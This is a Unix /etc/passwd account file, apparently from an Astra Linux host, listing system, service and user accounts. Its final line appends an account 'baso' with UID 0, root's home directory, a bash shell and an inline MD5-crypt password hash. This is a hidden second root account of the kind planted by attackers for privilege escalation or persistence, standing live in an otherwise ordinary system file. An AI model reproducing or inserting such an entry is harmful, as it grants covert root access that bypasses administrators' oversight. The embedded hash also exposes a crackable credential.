root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
_apt:x:103:65534::/nonexistent:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
pulse:x:105:114:PulseAudio daemon,,,:/run/pulse:/usr/sbin/nologin
fly-dm:x:106:117::/var/lib/fly-dm:/usr/sbin/nologin
sshd:x:107:65534::/run/sshd:/usr/sbin/nologin
ntp:x:108:120::/nonexistent:/usr/sbin/nologin
Debian-exim:x:109:121::/var/spool/exim4:/usr/sbin/nologin
nm-openvpn:x:110:123:NetworkManager OpenVPN,,,:/var/lib/openvpn/chroot:/usr/sbin/nologin
hplip:x:111:7:HPLIP system user,,,:/run/hplip:/bin/false
logcheck:x:112:124:logcheck system account,,,:/var/lib/logcheck:/usr/sbin/nologin
avahi:x:113:125:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
astra:x:1000:1000:astra,,,:/home/astra:/bin/bash
systemd-coredump:x:998:998:systemd Core Dumper:/:/usr/sbin/nologin
postgres:x:114:126:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
tomcat:x:999:997::/opt/tomcat:/bin/false
baso:$1$/vaLzZz7$kgGXJuRS7pREfH2eK5aM.0:0:0:root:/root:/bin/bash

